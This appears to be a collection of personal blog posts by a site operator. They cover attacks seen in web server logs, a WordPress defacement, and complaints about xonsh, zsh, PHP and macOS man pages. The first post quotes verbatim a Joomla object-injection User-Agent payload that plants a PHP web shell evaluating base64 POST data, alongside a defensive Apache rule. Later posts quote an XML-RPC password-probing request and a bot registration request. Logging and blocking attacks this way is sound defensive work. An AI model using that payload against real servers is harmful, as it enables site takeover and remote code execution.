An interesting injection attack via the HTTP user agent string

Looking at my web server logs this morning I noticed a new attack signature. The attacker performs a “GET /” with this “User-Agent” header:

}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:239:\"file_put_contents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"shootme.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST['360'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\"\\\\\\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd9

It’s obviously a code injection attack. Googling tells me this attack was first documented in December 2015, for example in this writeup. It’s an attempt to inject code via a Joomla CMS vulnerability. I don’t use Joomla so this doesn’t affect my site.

I already had some Apache HTTPD rules to protect against malicious user agent strings including one to detect if it begins with a left bracket:

RewriteCond %{HTTP_USER_AGENT} ^\[ [OR]

Noticing this attack suggests that generalizing that rule would be helpful. So my Apache config now contains this instead:

# If first char isn't an alphanumeric or underscore it's quite possibly an
# attempt to inject code.
RewriteCond %{HTTP_USER_AGENT} ^\W [OR]
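
To sanity check what that generalized rule catches, here is a minimal sketch in Python. It is an approximation: Python's re module stands in for Apache's regex engine, re.ASCII is my assumption for how \W behaves there, and the function name is made up for illustration.

```python
import re

# Same pattern as the RewriteCond above. re.ASCII keeps \W limited to
# "anything other than [A-Za-z0-9_]", which is an assumption about how
# the Apache rule behaves, not something verified against httpd.
SUSPICIOUS_UA = re.compile(r"^\W", re.ASCII)


def looks_suspicious(user_agent):
    """Return True if the first character is not alphanumeric or underscore."""
    return SUSPICIOUS_UA.search(user_agent) is not None


samples = [
    '}__test|O:21:"JDatabaseDriverMysqli":3:{',  # start of the Joomla payload
    "[left bracket, caught by the old rule too",
    "Mozilla/5.0 (X11; Linux x86_64)",
    "",  # an empty user agent has no first character to test
]
results = [looks_suspicious(ua) for ua in samples]
```

Note that an empty user agent is not matched by this pattern, so it needs its own rule if you want to reject it.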

I got hacked

I really dislike both PHP and WordPress despite using the latter, and thus the former implicitly, for this blog. Why? Because both make it far too easy to be hacked. Which happened to me just a few days ago. Despite not installing any third-party WordPress plugins and having a robust firewall against malformed web requests and regularly updating my software. In this case someone exploited a WordPress 4.7.0/4.7.1 vulnerability recently introduced into its REST API. They managed to replace my most recent post prior to this one. Google “attack /index.php/wp-json/wp/v2/posts” to learn more about this vulnerability.

Fortunately I back up my WordPress database and was thus able to restore it to a known good state. And this particular vulnerability did not allow the attacker to change any files; only content in the WP database. I was fortunate because I make regular backups of critical files and have my web site managed by git source code management. The former made it relatively easy to recover from the hack and the latter made it easy to determine my static content had not been compromised.

Xonsh is no longer a possible replacement for zsh

A few weeks ago I wrote about my dissatisfaction with zsh. I decided to take a close look at xonsh and fish.

I decided to try xonsh first because I’m a Python aficionado (I’ve been using it as my primary language for eight years). The idea of using all of my favorite Python language features and standard library along with the ease of launching external commands with I/O redirection and pipelines was intriguing. Because xonsh is currently at version 0.2.3 it was clear that the author didn’t believe it was ready for primetime. Nonetheless, I was willing to give it a try as the documentation and mailing list suggested it was in good enough shape for a software engineer like myself who is used to using software that is rapidly changing.

The first thing I did after installing it was run a few external commands and python statements. I then showed the command history using the builtin history command. So far, so good. I then tried showing the most recent command in the history using history show -1. That worked fine. Okay, let’s do something a little more challenging; show the most recent five history entries:

$ history show -5:
usage: history [-h] {show,id,file,info,diff,replay,gc} ...
history: error: unrecognized arguments: -5:

Oops! The documentation says that should work. The inverse, showing the first five entries with history show :5 does work. So I sent a message to the mailing list. Almost immediately the creator of xonsh responded with a proposed fix in the form of a GitHub pull request. Looking at the proposed fix I saw my first red flag. The fix was a kludge and included no unit tests to ensure that the fix was correct and to keep regressions from occurring. I countered with my own pull request that included extensive unit tests for the bug I was fixing.

I was happy to see that the author cares about fixing bugs in a timely manner. I was less happy that his proposed fix was something I would barely tolerate from a summer intern. Worse, before creating my fix I ran pylint against the module. OMFG! Pylint gave it a score of 7.13 out of 10. Worse still, pylint pointed out two outright bugs due to misnamed variables. The only way to tell if my change introduced more lint was to diff the lint output before and after my fix was committed. That is totally unacceptable. Too, the entire code base was riddled with problems ranging from the nitpicking trivial (trailing whitespace on a line, lines too long) to serious (missing doc strings, too many references to protected object members).

I was also deeply troubled by such bogosities as injecting __xonsh_history__ and __xonsh_env__ into the builtins module scope. Not only that but those are the primary means of accessing xonsh configurable settings. Ugh! For example, from the history.py module:

data_dir = builtins.__xonsh_env__.get('XONSH_DATA_DIR')
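
For anyone who hasn't seen this pattern, here is a minimal sketch of why it bothers me. The names __demo_env__ and DEMO_DATA_DIR are hypothetical stand-ins, not anything from the xonsh code base.

```python
import builtins

# Hypothetical stand-in for __xonsh_env__: some startup code, somewhere,
# attaches a settings mapping to the builtins module.
builtins.__demo_env__ = {"DEMO_DATA_DIR": "/tmp/demo"}


def data_dir_implicit():
    # No import, no parameter, no module-level definition. The name only
    # resolves because the assignment above ran first, which is exactly
    # the kind of thing a linter reports as an undefined name.
    return __demo_env__.get("DEMO_DATA_DIR")


def data_dir_explicit(env):
    # The conventional alternative: hand the settings to whoever needs them.
    return env.get("DEMO_DATA_DIR")


implicit = data_dir_implicit()
explicit = data_dir_explicit({"DEMO_DATA_DIR": "/tmp/demo"})
```

Both functions return the same value, but only the second one can be read, tested, or linted without knowing what some other module did to builtins.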

Despite that rocky start I thought there were enough positive things about the project to try using it and contributing to its improvement. But the code would have to be cleaned up before I would make any other substantive changes. So I asked if it would be okay if I contributed a sequence of changes to make the code lint clean. Getting the green light I submitted several lint cleanup pull requests. Getting each one accepted was a challenge. Primarily because the project owner isn’t really interested in having lint clean code. The final straw that made me decide to give up on the project as hopeless was a pair of cleanups the project owner objected to.

The first was changing

if len(inp) == 0:

to

if not inp:

Anthony told me to revert that because he didn’t like the negative conditional. The second was changing

for d in filter(os.path.isdir, path):

to

for d in (p for p in path if os.path.isdir(p)):

Anthony’s objection this time was that he prefers filter and map to list comprehensions and generator expressions. When I countered that filter and map are deprecated he said in effect “why are they builtins if they’re deprecated”. All you have to do is Google “python map filter deprecated”. One of the top five results is this article by Guido van Rossum proposing that map, filter, and reduce be removed from Python 3. There are plenty of other web pages that also make the case for not using them.
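
For the record, both cleanups leave behavior unchanged for the inputs in question. Here is a minimal sketch showing that; the function names and the sample path list are mine, and I'm assuming inp is a string or other sized container.

```python
import os
import tempfile


def dirs_with_filter(path):
    """The original spelling: filter() with a predicate."""
    return list(filter(os.path.isdir, path))


def dirs_with_genexp(path):
    """The cleanup: a generator expression with the same predicate."""
    return list(p for p in path if os.path.isdir(p))


# One directory that exists and one that (presumably) does not.
sample_path = [tempfile.gettempdir(), os.path.join(tempfile.gettempdir(), "no-such-dir-xyzzy")]
same_dirs = dirs_with_filter(sample_path) == dirs_with_genexp(sample_path)

# For sized containers, "len(inp) == 0" and "not inp" always agree.
same_emptiness = all((len(inp) == 0) == (not inp) for inp in ("", "x", [], [0], (), {}))
```

The one place the two emptiness tests differ is an input like None: "not None" is True while len(None) raises TypeError. That matters only if inp can be something other than a container.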

In other words, Anthony tries to use Python as if it were a different language. He doesn’t appreciate that there is such a thing as idiomatic Python. Anthony believes that just because you can achieve a result in more than one way there is no reason to prefer one alternative over another other than personal preference. Sorry, but I can’t contribute to a project with those ideals.

So I’m off to try fish.

P.S., I forgot to mention two other things that gave me a WTF moment. The first was when I noticed that the directions for running the unit tests did not test the code in my local git repository; they tested the code installed by pip. The tests were also not hermetic: they were affected by my local ~/.xonshrc file. Too, I couldn’t just type “make test” to execute the tests. So I decided to fix all of those problems. In the process of getting my changes accepted Anthony told me he wrote the directions to specifically test the installed code, not the code in his git repository, and he didn’t understand why anyone would test their uncommitted code. So either he doesn’t test changes before committing them or he regularly installs and runs untested code.

Second, the history subsystem is weird. Don’t take my word for it, go read the xonsh history documentation. Notice too this only partially correct assertion in the first paragraph of that page: “This is saved when the shell exits”. Okay, that is true of bash but it’s not true of many other shells sharing the same Bourne shell lineage such as zsh. Also, bash provides history -a to manually save the history and history -r to read it so you’re not limited to writing the current shell history only when it exits. Yes, yes, that’s a pretty braindead approach so I agree with Anthony regarding bash but other shells like zsh have managed to implement a sane solution without requiring xonsh’s ridiculously over-engineered solution.

Mac OS X man command ignores $MANPATH (which sucks for HomeBrew installed commands)

I recently ran brew install coreutils to get the GNU versions of various commands such as ls. The first thing I noticed was that “man ls” did not display the man page for the GNU ls command. Even after setting the $MANPATH environment variable to include the relevant directory the man page was not displayed. Not even with “man -a ls” which should have shown all matching man pages in succession. The $MANPATH environment variable is completely ignored on Mac OS X as far as I can determine.

Similarly, editing /etc/manpaths and creating a file in /etc/manpaths.d containing the appropriate paths had no effect.

Only editing /etc/man.conf had any effect. Furthermore, it was not enough to simply add a MANPATH directive before any of the stock entries. Doing so did allow “man -a ls” to display the GNU ls man page but it was still not the primary man page. To make the GNU ls man page the primary I also had to add a MANPATH_MAP directive before any of the other MANPATH_MAP directives. Once I did that executing “man ls” and “man -w ls” shows the HomeBrew installed ls command man page as the primary documentation for that command.

Note that by default the man pages for HomeBrew commands that do not shadow standard commands are found and displayed by the man command. That is because a “MANPATH /usr/local/share/man” entry in /etc/man.conf is sufficient to find the associated man pages. It’s not clear whether that entry is present in a stock Mac OS X installation or is added by HomeBrew.

I love Mac OS X and would rather get a root canal than use MS Windows. But once in a while an annoyance like this one makes me wonder if anyone at Apple actually verifies that the software behaves as the documentation states.

It’s time to replace Zsh with a saner shell because “unsetopt multifuncdef” breaks tab completion

Preface: I switched to Zsh roughly seven years ago. Prior to that I used Ksh93 for a decade. I’ve used many other UNIX shells prior to that (going back to approximately 1985 when I got my hands on my first AT&T SysV UNIX system). I’ve also used numerous shells on non-UNIX operating systems including IBM mainframes. So I like to think I’m not narrow-minded and parochial on issues such as which command shell is best.

On the zsh-users mailing list someone recently wrote about a zsh behavior that surprised them. The person ran

$ git add foo().bar

That created three functions named git, add, and foo. That’s because Zsh by default allows multiple function names when defining a function. This is considered a feature by the Zsh community. Worse, it is enabled by default and you can disable it. I view both capabilities as two of the many ill-advised features that have turned zsh into a shell whose behavior is almost impossible to understand or predict.

After reading that message thread I figured it would be a good idea to disable this feature in my interactive shells so I added

unsetopt multifuncdef

to my ~/.zshrc file. Imagine my surprise when, a few days later, after rebooting my computer and starting fresh shells, I found that any attempt to invoke tab completion resulted in this error:

_main_complete:143: parse error near `()'

That’s because the /usr/share/zsh/5.0.8/functions/_main_complete file contains this block of code:

TRAPINT TRAPQUIT() {
    zle -M "Killed by signal in ${funcstack[2]} after ${SECONDS}s";
    zle -R
    return 130
}

Because zsh has no concept of modules or namespaces (other than function scope) changing an option in an interactive shell can readily break any function that is autoloaded by that shell; such as the completion functions.

Frankly, I’ve encountered too many such annoyances with Zsh. Even the developers who answer questions on the zsh-users mailing list frequently do the virtual equivalent of shrugging their shoulders and saying that some behavior or other is weird but it’s too late to change it. Not to mention too many of them seem to think it is a good thing that Zsh encourages writing code more cryptic than your typical Perl programmer would ever dream of. Such as this:

_comp_colors+=( "=(#i)${prefix[1,-2]//?/(}${prefix[1,-2]//(#m)?/${MATCH/$~toquote/\\$MATCH}|)}${prefix[-1]//(#m)$~toquote/\\$MATCH}(#b)(?|)*==$tmp" )

Or this:

list=(${${${(0)"$(git config -z --get-regexp '^alias\.')"}#alias.}%$'\n'*})

Bye-bye, Zsh. It’s time to switch to a saner shell.

P.S., Yes, I understand I could simply file a bug report to make the standard completion code robust in the face of a user unsetting that option. The point is that this is not an isolated incident. It reflects a fundamental problem with zsh trying to be all things to all people.

P.P.S., This bug apparently only existed in zsh v5.0.8 (the version that currently ships with Mac OS X 10.11 “El Capitan”). Great, someone noticed and fixed the problem quickly. That doesn’t negate my broader point that zsh simply has too many ad-hoc features that interact in surprising ways.

Updated 2015-10-28: Over the next couple of days I’m going to look closely at Xonsh and Fish for interactive use. If I don’t choose either of those I’ll probably go back to Ksh93. For scripting I’m going to switch to Bash.
Updated 2015-10-29: Two days ago a discussion was started about extending the recursive globbing syntax. Today one of the primary developers posted a patch to implement yet another configurable option to alter how recursive globbing works. With no discussion regarding alternatives, potential problems, whether the added complexity is worthwhile, etc. This is exactly the type of hastily implemented change that has made zsh a kitchen sink of features that don’t always play well together. And is another example for why I’m abandoning zsh for a more stable shell.

I would rather be unemployed than forced to write code in PHP

My blog currently uses WordPress. I’ve written numerous times about the various PHP based attacks I see every day because of the stupid security mistakes PHP programmers make. I’ve also made a few changes to the WordPress software to make it saner about handling and logging requests. Thus I knew PHP was awful from my own limited interaction with it. Then I came across this article: PHP: a fractal of bad design. This one point from that article should be enough to result in a death sentence for the language:

PHP’s one unique operator is @ (actually borrowed from DOS), which silences errors.

Holy shit! The developer(s) of PHP remind me of a coworker in my first post college job. He thought he could design and implement a new language. Yet he had no idea what the computer science terms “parser”, “lexical analysis”, “tokenizer” etc. meant. I suspect he would be welcomed by the PHP community.

Interesting new WordPress attack signature using POST /xmlrpc.php

Today I noticed an interesting, and hitherto unseen, attack from 5.152.192.218 which is owned by cloud provider redstation.com (or redstation.co.uk if you prefer). The attack started with this request:

POST /xmlrpc.php HTTP/1.0
Host: www.skepticism.us
Content-Type: application/x-www-form-urlencoded
Content-Length: 101

<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>

Note the ancient HTTP/1.0 protocol specification. The methodCall is also ill-formed causing PHP to issue a notice and warning messages about Undefined index: VALUE and Invalid argument supplied for foreach().

That request was followed by another POST /xmlrpc.php that attempted to use the system.multicall method; something I’ve never seen in an attack before now. The “multicall” methods were all wp.getCategories invocations with my user ID and various passwords. In the past six months (as far as my logs go) I only started seeing attempts to exploit wp.getCategories two days ago. And this attack was the first one to do so by using system.multicall to reduce the number of requests it had to make to test which, if any, of a large number of passwords was valid.

A few minutes after writing the previous text I noticed that I had in fact seen another attack employing the system.multicall method to execute wp.getCategories multiple times in a single request. That attack was from ttnetdc.com in Turkey. That attack was very different. First, it was not preceded by the demo.sayHello request. Second, the wp.getCategories calls all used the generic admin account rather than my account. Third, the XML was formatted in a more or less human readable form rather than the tightly packed sequence of tokens from the attack I saw this morning and talk about above.

Thus it appears that a general approach about how to efficiently test for valid WordPress credentials was recently documented and we’re now seeing various hackers attempt to exploit that advice.
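
If you log request bodies, spotting this pattern is straightforward. Below is a minimal sketch using Python's standard xmlrpc.client module to summarize what a system.multicall body wraps. The function name is hypothetical, the sample body is generated locally rather than copied from my logs, and you should be careful about feeding untrusted XML to any parser.

```python
from collections import Counter
import xmlrpc.client


def multicall_summary(body):
    """Count the method names wrapped inside a system.multicall request.

    Returns an empty Counter for any other XML-RPC method.
    """
    params, method = xmlrpc.client.loads(body)
    if method != "system.multicall" or not params:
        return Counter()
    calls = params[0]  # by convention, a list of {"methodName": ..., "params": [...]}
    return Counter(
        call.get("methodName", "?") for call in calls if isinstance(call, dict)
    )


# A made-up body shaped like the attack: many wp.getCategories calls, each
# with a different password guess, packed into one request.
sample_body = xmlrpc.client.dumps(
    (
        [
            {"methodName": "wp.getCategories", "params": ["1", "someuser", "guess%d" % i]}
            for i in range(3)
        ],
    ),
    methodname="system.multicall",
)
summary = multicall_summary(sample_body)

# The probe that preceded the attack is not a multicall at all.
probe = '<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>'
probe_summary = multicall_summary(probe)
```

A single request whose summary shows dozens or hundreds of wp.getCategories calls is almost certainly a password guessing run and a reasonable thing to block.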

Twitter needs to hire a competent software engineer to fix their web crawler

This evening I posted an article about an Indiana State Police trooper who uses his position of power to proselytize to motorists he stops. That resulted in Twitter crawling my web server. Which would be fine but the first four requests, in a 715 ms interval, were GET /robots.txt. Every single request came from the same address. Every single response was an HTTP 200 status that included the contents of the robots.txt file. Every single response took less than 1 ms. What the fuck? How hard is it to avoid duplicate requests from a queue (hint: it’s pretty fucking easy)?
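
To back up that hint, here is a minimal sketch of a fetch queue that refuses duplicates. It is obviously not how Twitter's crawler works (I have no idea how it is built); the class name and URL are just for illustration.

```python
from collections import deque


class DedupQueue:
    """FIFO queue of URLs that silently drops anything it has already seen."""

    def __init__(self):
        self._pending = deque()
        self._seen = set()

    def push(self, url):
        """Queue the URL and return True, or return False if it is a repeat."""
        if url in self._seen:
            return False
        self._seen.add(url)
        self._pending.append(url)
        return True

    def pop(self):
        """Return the oldest queued URL."""
        return self._pending.popleft()

    def __len__(self):
        return len(self._pending)


queue = DedupQueue()
accepted = [queue.push("http://www.skepticism.us/robots.txt") for _ in range(4)]
```

A real crawler would also want to expire entries so robots.txt gets refetched eventually, but four fetches in 715 ms is not that.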

I went to the Twitter web page in the hope of finding an email address or web form where I could provide some constructive feedback regarding their web crawler. If it exists I couldn’t find it after searching for nearly ten minutes.

Regular expressions: “Now you have two problems”

I’ve used the Zsh shell as my primary command line and scripting shell for the past seven years; and before that Korn shell for over a decade. Recently on the zsh-users mailing list someone asked for help that resulted in a recommendation to use a negative look-ahead regular expression.

Mikael Magnusson correctly pointed out

As a sidenote, (^foo)* is always useless to write,
since (^foo) will expand to the empty string, and then
the * will consume anything else. A useful way to think
of (^foo) is a * that will exclude any matches that
don't match the pattern foo.

To which I replied that people should Google “regular expression negative lookahead”. Which will result in numerous articles talking about Jamie Zawinski’s observation:

Some people, when confronted with a problem, think “I know, I’ll use regular expressions.” Now they have two problems.

I wholeheartedly agree with that sentiment. Notwithstanding the fact I still employ regular expressions every single day. The important thing being that I avoid them outside of ad-hoc interactive searches unless I have expended considerable thought about their correctness and failure modes if handed malformed input.
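
Here is a minimal sketch of what I mean by thinking about failure modes, using a negative lookahead in Python's re module (not a zsh glob). The pattern and the cases are my own illustration.

```python
import re

# Negative lookahead: accept any string that does not START with "foo".
NOT_FOO_PREFIX = re.compile(r"(?!foo).*", re.DOTALL)


def accepts(text):
    """Return True if the whole string matches the pattern."""
    return NOT_FOO_PREFIX.fullmatch(text) is not None


# Inputs worth writing down before trusting the pattern in a script.
CASES = {
    "bar": True,
    "foo": False,
    "foobar": False,
    "barfoo": True,  # "foo" is only rejected as a prefix
    "": True,        # the empty string slips through
    "Foo": True,     # so does a different case
    " foo": True,    # and leading whitespace
}
surprises = {text for text, expected in CASES.items() if accepts(text) != expected}
```

Whether the last three cases are acceptable depends entirely on what the pattern is guarding, which is the point: you have to decide, not assume.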

Thailand has reached #1 in attacks against my server

The number of attacks from Thailand has been a significant fraction of the total for several months. In the past 24 hours I saw attacks from 51 addresses in Thailand, 241 in the past week. That exceeds the runner-up country (US) by a factor of five. Ten months ago I noted that Italy was the source of a disproportionate number of attacks.

Every single recent attack from Thailand has attempted to register a bogus WordPress account via a POST /wp-login.php?action=register request. Some piece of malware has managed to successfully infect a huge number of personal computers in Thailand and nowhere else. All of the computers are in the totbb.net domain.
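
Counting these is simple enough to script. The sketch below assumes Apache's "combined" access log format and uses made-up log lines with documentation addresses, not my real logs; mapping addresses to countries or domains is a separate step that isn't shown.

```python
import re
from collections import Counter

# Assumes the Apache "combined" log format: address, identity, user,
# [timestamp], then the quoted request line.
LINE_RE = re.compile(
    r'^(?P<addr>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)'
)


def registration_attempts(lines):
    """Count POST /wp-login.php?action=register requests per client address."""
    counts = Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if (
            m
            and m["method"] == "POST"
            and m["path"].startswith("/wp-login.php?action=register")
        ):
            counts[m["addr"]] += 1
    return counts


# Made-up sample lines for illustration only.
sample_log = [
    '203.0.113.7 - - [01/Jan/2015:00:00:01 +0000] "POST /wp-login.php?action=register HTTP/1.1" 200 1234 "-" "Opera/9.80"',
    '203.0.113.7 - - [01/Jan/2015:00:00:09 +0000] "POST /wp-login.php?action=register HTTP/1.1" 200 1234 "-" "Opera/9.80"',
    '198.51.100.3 - - [01/Jan/2015:00:01:00 +0000] "GET / HTTP/1.1" 200 5678 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2015:00:02:00 +0000] "POST /wp-login.php?action=register HTTP/1.1" 200 1234 "-" "Opera/9.80"',
]
attempts = registration_attempts(sample_log)
distinct_addresses = len(attempts)
```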

Below is the most recent such request. The details of the user login and email vary but the other details are pretty consistent.

P.S., I recognize that the numbers I’m reporting are insignificant compared to most web servers let alone the Internet as a whole. But that’s the point. My web server (blog) is only a little over a year old. My server is itself insignificant. Which means I have relatively little traffic to wade through. Which makes detecting some problems and trends easier.

POST /wp-login.php?action=register HTTP/1.1
Host: www.skepticism.us
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: Keep-Alive
User-Agent: Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://www.skepticism.us/wp-login.php?action=register
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

user_login=PattiThorne3&user_email=pattisabj9571%40admin2%40metalchopsaw.info&redirect_to=&wp-submit=Register